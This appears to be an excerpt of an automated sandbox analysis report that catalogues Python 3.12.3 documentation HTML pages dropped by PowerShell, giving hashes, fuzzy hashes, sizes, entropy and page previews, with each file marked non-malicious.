                              MD5:194ECA6A70F0693649A0C17564B5A6C8
                              SHA1:9D67F7A4F04AC3DCBAC0C9A77FFE37DC83B11C7B
                              SHA-256:45E1E40288B4098D792AEE858152016A3FDED0AF79B7FD78912B65E411477CAB
                              SHA-512:0D9418EB1C55DF587A582E00339BDED3648CECDFAD4793F78A3D4B2E4AF4AC36C09302A8DBB745673361D85523955113FFFDD1731FA93494A7848756C8129B60
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Dealing with Bugs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/bugs.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python is a mature programming language which has established a reputation for stability. In order to maintain this reputation, the developers would like to know of any deficiencies you find in Pyt..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python is a mature programming language which has established a reputation
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):16603
                              Entropy (8bit):4.856697584687944
                              Encrypted:false
                              SSDEEP:192:WR1xbartHKHqkX1vGMKMggn4TMbYBpFskGMg6wnuTMbtBA76dqEC:AHqklXKgn4TM+fHwnuTMI76dqEC
                              MD5:57170BC017FABA6BAA30E47676F0B82F
                              SHA1:5545C292125A4F2057213D2B0024FD4738AB4CDF
                              SHA-256:CB71F3FCCCB711792D6CDCEC50FF1D523FA3AE0B8B76B9973E66452C5E7A84A6
                              SHA-512:61849E81416B07B31B3F11B7E3DA712F0ECA8DE92E2F13848B048D38E910F0983739B1E7AC4C0F97E8AA9E23BA72713CFFCBE60414C4F08A8DC4DBF283D6401C
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Abstract Objects Layer" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/abstract.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter interact with Python objects regardless of their type, or with wide classes of object types (e.g. all numerical types, or all sequence types). When used on object type..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter interact with Python objects
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1254), with CRLF line terminators
                              Category:dropped
                              Size (bytes):23547
                              Entropy (8bit):4.905608536545633
                              Encrypted:false
                              SSDEEP:384:OEHqklfQ6EnwCTMe8VJueIJebJheIJerYbVJJeIVJ98JeoJselJ98JerYZ0eGtDk:tqy4DrM3JueIJebJheIJerYJJJeCJ986
                              MD5:BD845DBEED53B8C79994EB0FA130C66D
                              SHA1:F97B5C0B18C05805EA447692BC7A53F8B6C6149A
                              SHA-256:894F17F9D88D1D25D968CF1240D950FBE7C92B6E31640D1BA2670DC1A5FBA83D
                              SHA-512:B89B4A4D1CA716F73FA2D34024B9AED86606D6FFE1543140C39779F27FA9D991B1A2AF66B51A75E3A72F52A2F55BDB41F897981AF4369BACC8AC744220054E7C
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Allocating Objects on the Heap" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/allocation.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Allocating Objects on the Heap &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="st
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (423), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20544
                              Entropy (8bit):4.946657739990355
                              Encrypted:false
                              SSDEEP:384:CTYHqklcyxn6TMI8qekeFereatemeHK2sxEheu4o//PnYTMe76dqEC:CTsqycKYMZqekeFereatemeHKlxEheBL
                              MD5:3795D5DB681C6B3E5025F2C3DF00DD01
                              SHA1:0539C578532C3DB3C44CE08EDF57CD386E288AEA
                              SHA-256:5C5BB14B151D7EF802500A8AE3BE4285E929A88D096733EE930228BB1DB0803D
                              SHA-512:B218C957BDB79D9592297AB3499093448C90A5A07989D9E7B1C8964DAB4C8C30413017F2DB4B176D0108EB509365B8CE1570522DB478048D5164D7697339246F
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="API and ABI Versioning" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/apiabiversion.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="CPython exposes its version number in the following macros. Note that these correspond to the version code is built with, not necessarily the version used at run time. See C API Stability for a dis..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="CPython exposes its version number in the following ma
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1573), with CRLF line terminators
                              Category:dropped
                              Size (bytes):105280
                              Entropy (8bit):4.817954471982983
                              Encrypted:false
                              SSDEEP:1536:oqyTM0FM76e2DWQBCA52OUngNo2G2jC95JoayaW6d9lSE3OKgUeCJHeCHtk9reCH:q8HoWQBCA52chOtUqq2J9g
                              MD5:75E56C71F8C49F3EFB2973D14F1B8D93
                              SHA1:AFB958E3408E1D5BB1422F55F40B24C54F28076F
                              SHA-256:8A7E2FFC0F44AAFD08D9C7DE0D5D6428FE2F213AE000F0EB5029437975D94510
                              SHA-512:F880B23EA38720EB35838C46B3AD63DDB14F73A98E805F40F0D1E8C352B5CBC48820EF40C053407751BDE5A93FFC7B4AC0B3375F72AC931248540F23F19DD49F
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Parsing arguments and building values" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/arg.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions are useful when creating your own extensions functions and methods. Additional information and examples are available in Extending and Embedding the Python Interpreter. The first th..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions are useful when creating your own
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (602), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19816
                              Entropy (8bit):4.899593946513707
                              Encrypted:false
                              SSDEEP:384:kHqkl/EqnWTMarDLeEnzZeIVJlRVJnevJVJueRZev1eJVJcevxTpunkTM876dqEC:oqy/h8MmLeEnzZeCJlzJnejJuenedebD
                              MD5:18D0469E76ABBA5C1A11ACFFD1A44C5E
                              SHA1:818B16213A1A455B01027492E821AD2C04FE1CBF
                              SHA-256:A86FC96F7D9D4EBB1843FDBE82CC0768E6690505AC7CA57E1C40FB0D3F459DD8
                              SHA-512:AA4FB46254EC452364EFA786318A8B4263C9991122251199321A66644507A14AC1C313B4677D33738DF2AD0956C8F5916AC6EA2B38F721C2AD0AEF2B89E9259C
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Boolean Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/bool.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Booleans in Python are implemented as a subclass of integers. There are only two booleans, Py_False and Py_True. As such, the normal creation and deletion functions don.t apply to booleans. The fol..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Booleans in Python are implemented as a subclass of integers. There
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1175), with CRLF line terminators
                              Category:dropped
                              Size (bytes):92164
                              Entropy (8bit):4.893692641705431
                              Encrypted:false
                              SSDEEP:1536:4qyeMZFU8v3e2HjeGkNJbeJgecve0deICHzeLNeUJne0JkeGpJ+eioHRede0eIe4:h8Jk2XkZpZoTZg
                              MD5:BB33C1922D336D9F4E9C8AEE33823E3F
                              SHA1:644D2C647EA3DAF536ECF2398D2A9E9430E1D6B3
                              SHA-256:BE7E1A8BAD865FEFE598FF580E201FBAB11F58B1311E296D90F8F0DA97D4C52A
                              SHA-512:8D51A2368050DB668D6AE61A5E396D605657CA6BE4F7CE955AA3653E374C00C1438C76D1C9FB5700479D5A8D808FF1F9A5B7CD0CBF2CC73AC0C98543D084B62F
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Buffer Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/buffer.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Certain objects available in Python wrap access to an underlying memory array or buffer. Such objects include the built-in bytes and bytearray, and some extension types like array.array. Third-part..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Certain objects available in Python wrap access to an underlying mem
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1010), with CRLF line terminators
                              Category:dropped
                              Size (bytes):27357
                              Entropy (8bit):4.906893227281136
                              Encrypted:false
                              SSDEEP:768:yqyQbamMKMe/OYelOceCJlbheCJlGJUeCJlzukJAeiCHXr2xJXeCJXeJWLVeCJbd:yqyaMKMe2YeUceCJlbheCJlGJUeCJlz0
                              MD5:4ACAD7ED5DB31641356BB198E7F3580F
                              SHA1:192C71D66259F6B83434019AE6E16F15D540DE30
                              SHA-256:B6D000BABC350B1217DE8ECED27CBCCB91D120B1BAF4D0E233F97456E723A18F
                              SHA-512:2260BB6D0DE1D025F0783CBD98EEC770F8289E489D8619BD33A70EABF933C9FF9F839B49135F390FF697A555531CD81C61F07A0FE802C07B81B56EBD1920E779
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Byte Array Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/bytearray.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Type check macros: Direct API functions: Macros: These macros trade safety for speed and they don.t check pointers." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Type check macros: Direct API functions: Macros: These macros trade safety for speed and they don.t check pointers." />..<meta property="og:ima
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1121), with CRLF line terminators
                              Category:dropped
                              Size (bytes):43397
                              Entropy (8bit):4.8909900225739635
                              Encrypted:false
                              SSDEEP:768:pqysULMKwePOQe1+6IeCJl/leCJlxJieiCHSvJ8eiCHSr21JgeiCHtkhuKJ0eiCs:pqyZMKweGQec6IeCJl/leCJlxJieiCHO
                              MD5:13B9F6F70BFF2588DDE59CE0E362870C
                              SHA1:BC5C759D19130D72A1E8A9BB61A604298A5CD7DE
                              SHA-256:FB59306ADA4B96802A8C94D003C8767BFAA208D89DDAD00DD7DC18A5637979EC
                              SHA-512:0C076FA73110A98FE5E0715E75BCF565C9A3CA8541DDE6DFA3C27C1EC0F6A3C01629AB18D8D6BA06AABCF4E3A8BF4343F5FDCB9045766E2B68EEEBB2B3DDE7AC
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Bytes Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/bytes.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions raise TypeError when expecting a bytes parameter and called with a non-bytes parameter." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions raise TypeError when expecting a bytes parameter and called with a non-bytes parameter." />..<meta property="og:image:width" content="200" />..<meta pro
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2016), with CRLF line terminators
                              Category:dropped
                              Size (bytes):71486
                              Entropy (8bit):4.9168857488632725
                              Encrypted:false
                              SSDEEP:1536:WqyaMYiVlJGMheRG6JyylJ6HHy1sylJaRXrehXPe0s94qeCJ9vJbeCJyeJmeJmkm:2DZjg
                              MD5:6C78E3C5F7710C32C1C79C6F85DD88A5
                              SHA1:817E1E09A124DD4D89F2A8A5C0DD7769C1FAEE4E
                              SHA-256:482D4441A2C0A0FAD02699DB76BAEEB230C742624E973CBEFD109DA44075A484
                              SHA-512:8AA9DEEF38C1F8B5E51302996D3A4538D5DB5A489DE7A6D9C1C7583E3E2E23898815B30CF8D827BF8FA6590D7C20875883942AE1E09A65C390770D643C31C651
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Call Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/call.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="CPython supports two different calling protocols: tp_call and vectorcall. The tp_call Protocol: Instances of classes that set tp_call are callable. The signature of the slot is: A call is made usin..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="CPython supports two different calling protocols: tp_call and vectorcall
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1156), with CRLF line terminators
                              Category:dropped
                              Size (bytes):36464
                              Entropy (8bit):4.840757880078915
                              Encrypted:false
                              SSDEEP:768:SqyHq4Mpve4WfBe5xQVeCJs9JRerHJeCHJbOABHhIeCJ3eCHJEybiueCJ3EfzHhx:SqyjMpve4WfBe5xQVeCJs9JRerHJeCHh
                              MD5:D4737B36C8139F229E8BD3B9678E56F6
                              SHA1:06DE3416092A1E197D898DAA8D8B43E4E3F2F121
                              SHA-256:91DD68E0DFE23719AACAB9E09510B82B8AD3DB7E4D78E169FF797B73717D6CF4
                              SHA-512:05FAEAB61270D65287ECB1675AAD45F119A57597C0B429784B62BAC35CF3F8EA81DF8DA1A19E93EB400E91790EB9680A85F9B9FDFC9642D21277713D3A3F1EB9
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Capsules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/capsule.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Refer to Providing a C API for an Extension Module for more information on using these objects." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Refer to Providing a C API for an Extension Module for more information on using these objects." />..<meta property="og:image:width" content="200" />..<meta property="og:image:hei
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (864), with CRLF line terminators
                              Category:dropped
                              Size (bytes):21181
                              Entropy (8bit):4.870153602982891
                              Encrypted:false
                              SSDEEP:384:RHqkl4wsnJTM9VeaDzeQheIVJjGVJqeIVJj2VJ0eIVJCpVJ0eIVJC/5eIVJCEVJh:hqy4d9M9VekzeQheCJjMJqeCJj8J0eCe
                              MD5:0C1D0AA7B6BC97311C45670DC76634CA
                              SHA1:BCE9B1E95363BFDB8FBD157967B450DC8B59E28E
                              SHA-256:170620D563439C6C53135899827A0E904DF8FF96B419AC92EE59A5DA8DAA0A3C
                              SHA-512:F220472843C2AB6F881A04804F6854FD9DD1BB49C6EADD37463CB33B0636F0D8D1759760FDF0619CDF7833AC3EF12D78C10C7A050E7F94108DC26AAC63DF8CD1
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Cell Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/cell.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content=".Cell. objects are used to implement variables referenced by multiple scopes. For each such variable, a cell object is created to store the value; the local variables of each stack frame that refer..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content=".Cell. objects are used to implement variables referenced by mult
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4446), with CRLF line terminators
                              Category:dropped
                              Size (bytes):55705
                              Entropy (8bit):4.843599721590231
                              Encrypted:false
                              SSDEEP:1536:OqyiM38ezge9MeCJgiOekJgV+ekJgSJWeUoocoBoaoEeJreJqeJkeJpeJGeJYeJ3:zShag
                              MD5:710C2BE9619FB179A6E5F08B364931F9
                              SHA1:E070E54A56D86A9879EE91DCE1C22C513492BF0C
                              SHA-256:FAFCA581AD0AC320BC255CBD4F3F4BC396426D3AA1214FACE26D980DF5D9ADC4
                              SHA-512:C1F7441A080514097072548A0025946ED1AD2C5BE0A418624102245744FD28BBAC0BE8B77E81E3656AE7A1A5BE72F4D8A73FACD411C7793F0577498E470AF0C8
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Code Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/code.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Code objects are a low-level detail of the CPython implementation. Each one represents a chunk of executable code that hasn.t yet been bound into a function. Extra information: To support low-level..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Code objects are a low-level detail of the CPython implementation. Each
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1274), with CRLF line terminators
                              Category:dropped
                              Size (bytes):43417
                              Entropy (8bit):4.83612680829369
                              Encrypted:false
                              SSDEEP:768:Oqy+P4MAweCJ1cLeCJ18DeiCHjsWJueCJ5eCHjeCHJl63JmeCJ5eCHjeCHJV65JM:OqyfMAweCJ1cLeCJ18DeiCHjsWJueCJ7
                              MD5:5A84BB66E9CD299F3331A17301B25AD9
                              SHA1:1B6A4829DD7B8DBCDBC55A45EB3F2BDA056B0116
                              SHA-256:9B68DBF25DFAD19BAD6755CC38E8C1189E2E97EF6E1612C6FBC47CDC35AD061B
                              SHA-512:E58E65654FA3CB6D6A2C7C1D33474CD921F71D1F44466288662A4DF1333197E67554FD9AB66F9A9E104725B5DD2F68B8CE33725B7A4BD4E20C7D19CC0882F3A0
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Codec registry and support functions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/codec.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Codec lookup API: In the following functions, the encoding string is looked up converted to all lower-case characters, which makes encodings looked up through this mechanism effectively case-insens..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Codec lookup API: In the following functions, th
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (833), with CRLF line terminators
                              Category:dropped
                              Size (bytes):34547
                              Entropy (8bit):4.892106689102129
                              Encrypted:false
                              SSDEEP:768:4qy5T+M8xe3xd4zeDwPXodeDwPXKKeDd4veDwPXWveDCPzRueDdPuHHeoleCDeCq:4qy4M8xe3x+zeDwPXodeDwPXKKeDd4vG
                              MD5:637098068684E175F04062C3C86C5785
                              SHA1:C5D68268AD9EFC448BC82858F376B48C3D4F707B
                              SHA-256:42E6884E3139551843087EDDB5814AB5738BA81430725141C59055B6FACFA0F3
                              SHA-512:DFFFC0449367E8ADFC20DF4A8BA25597B373F690AC41C325B10D7054B52A076A427D39D22DC1C83B5591C2870D6D0DE954C7DC7094507AD541FAF73040922C10
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Complex Number Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/complex.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python.s complex number objects are implemented as two distinct types when viewed from the C API: one is the Python object exposed to Python programs, and the other is a C structure which represent..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python.s complex number objects are implemented as two d
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):25525
                              Entropy (8bit):4.891256045159486
                              Encrypted:false
                              SSDEEP:192:WEvartgKHqkX1vSmMzMg4nQTMb9BsR5Q+qs9xV5wEsJ5UCOA06zlQypVmdVYhkCV:AHqklkn4nQTMJoxyhXy4nmTMx76dqEC
                              MD5:E873E4762DFC00724E59871CAFF91A6F
                              SHA1:91EB19FA9402C48D88163C616ED06A7FA275C2F2
                              SHA-256:A680617C9E00485FB0B6FD8B597B6AFAD9EC51DCCE54485587689E9FE14BED04
                              SHA-512:47EC7C8893917C65428C7B14D2F943B555A6FAF5138B3D86EFA13562DEC04A4466A1B8D35860596A3EB19A9E507B0EA772F360FA3E2DFF5F40AD555821B88EBD
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Concrete Objects Layer" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/concrete.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter are specific to certain Python object types. Passing them an object of the wrong type is not a good idea; if you receive an object from a Python program and you are no..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter are specific to certain Pytho
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1200), with CRLF line terminators
                              Category:dropped
                              Size (bytes):33749
                              Entropy (8bit):4.8817079061883515
                              Encrypted:false
                              SSDEEP:768:xqyOSrM52TezSepaeTgexDe2neEReCJlyeBUeCJlRpueCJlBJRerCJeeCJN+7JFN:xqyXM52TezSepaeTgexDe2neEReCJl93
                              MD5:CE70A621DB9EC2C554069CE7CF8BA0E1
                              SHA1:9197CEAE4094E4ED9C62C3DEECEEF103D0B4404F
                              SHA-256:FE1940FBC07D947B633C8830D7646D7268A7D35097B64F2FED7B0A89F397B9A5
                              SHA-512:7FC6B2D63208C101A8900FA0980C4111E77CD24970E31EABD7C7DC48AD7357A1882DEAA44381FAC879EE071A2749F4A75D028ED7E8A4CB7BF3CB960749E72015
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Context Variables Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/contextvars.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This section details the public C API for the contextvars module. Type-check macros: Context object management functions: Context variable functions:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This section details the public C API for the contextvars module. Type-check macros: Context object mana
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1118), with CRLF line terminators
                              Category:dropped
                              Size (bytes):38240
                              Entropy (8bit):4.812067415404105
                              Encrypted:false
                              SSDEEP:768:pNqqyPydMl9e9HrQqeCHtkLLe9HrQqeCHt+maEEeiCHrZHMjeoOxuN/deiCHrZHt:pNqqysMl9e9HrQqeCHtkLLe9HrQqeCHl
                              MD5:9DC1E315EB676DB4D4C6B8EC1962B93F
                              SHA1:59675D0484815E7768C6145C5B1BB41DA0B8DFD3
                              SHA-256:DE645D1D65FEE20E75803A3547AC2759E291E9A64DBA91B4EDB18A7455499E9E
                              SHA-512:BC30AE807A3EF048F2FE89F40C79C75CF41B3190CCCB48DCBE4E021DC0DF66676BF57E5065A212B9AB0F6A95E9112AA468AB3E2BB00C029B71D7D6F0D8C5D61E
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="String conversion and formatting" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/conversion.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Functions for number conversion and formatted string output. PyOS_snprintf() and PyOS_vsnprintf() wrap the Standard C library functions snprintf() and vsnprintf(). Their purpose is to guarantee con..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Functions for number conversion and formatted s
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1283), with CRLF line terminators
                              Category:dropped
                              Size (bytes):16927
                              Entropy (8bit):4.870825245605953
                              Encrypted:false
                              SSDEEP:384:8HqklxBZn1TM4dwe0D0edleIVJjtVJHe+JpEVJJEVJK9cHn5TMi76dqEC:gqyx3xM8wem0edleCJjfJHe+JpeJJeJ1
                              MD5:354C9315BADA57E5E01BE150C9AD620E
                              SHA1:3F6218C4D1C34810AA4E7E371DEC6A66F72DA227
                              SHA-256:D19880403F68DA999DDC9AEDE58CCC9044C5D20434A824CE457D892B8EB974A0
                              SHA-512:6DAFCD25CA3D37B23BCF1F94999B14A8CF096D18098B1AEEBDB662A666DC16406F5A2739E3E45726CBF638729FA40F0DDD44C1587A9A428808E99A05F290B788
                              Malicious:false
